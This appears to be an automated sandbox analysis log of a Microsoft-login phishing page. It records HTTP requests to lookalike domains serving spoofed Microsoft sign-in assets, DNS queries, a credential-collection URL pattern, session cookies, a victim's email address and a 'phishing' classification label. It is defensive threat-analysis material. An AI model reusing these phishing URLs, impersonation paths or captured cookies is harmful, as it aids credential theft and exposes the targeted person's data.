esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /common/instrumentation/dssostatus HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /rx567/ HTTP/1.1Host: cocteldedeas.mxConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA; 8DQ6bV-yBfaqqQlKL56scO8tC2Q=1736541698; g4H-foKykfHJJhggqIe6T1TUqbg=1736628098; xMXu8kMhP2nWgiPnkh-v3z0m_pw=HwrWEDPJFMBTmFswmSpWLtgcorE
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: cocteldedeas.mx
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: banirego.com
            Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: 1iugongna.com
            Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
            Source: global trafficDNS traffic detected: DNS query: portal.microsoftonline.com
            Source: global trafficDNS traffic detected: DNS query: autologon.microsoftazuread-sso.com
            Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
            Source: unknownHTTP traffic detected: POST /rx567 HTTP/1.1Host: cocteldedeas.mxConnection: keep-aliveContent-Length: 22sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Requested-TimeStamp-Expire: 7FSfy0fuJdl6efuyHLNjDVp1sU: 29262134sec-ch-ua-mobile: ?0X-Requested-TimeStamp-Combination: X-Requested-Type-Combination: GETContent-type: application/x-www-form-urlencodedX-Requested-Type: GETUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Requested-with: XMLHttpRequestX-Requested-TimeStamp: sec-ch-ua-platform: "Windows"Accept: */*Origin: https://cocteldedeas.mxSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://cocteldedeas.mx/rx567Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA
            Source: chromecache_78.2.dr, chromecache_92.2.drString found in binary or memory: http://knockoutjs.com/
            Source: chromecache_78.2.dr, chromecache_92.2.drString found in binary or memory: http://www.json.org/json2.js
            Source: chromecache_78.2.dr, chromecache_92.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
            Source: chromecache_77.2.drString found in binary or memory: https://banirego.com/?uxkvuxjb&email=$
            Source: chromecache_78.2.dr, chromecache_92.2.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.js
            Source: chromecache_76.2.drString found in binary or memory: https://login.microsoftonline.com
            Source: chromecache_76.2.drString found in binary or memory: https://login.windows-ppe.net
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
            Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
            Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
            Source: classification engineClassification label: mal60.phis.win@21/47@28/10
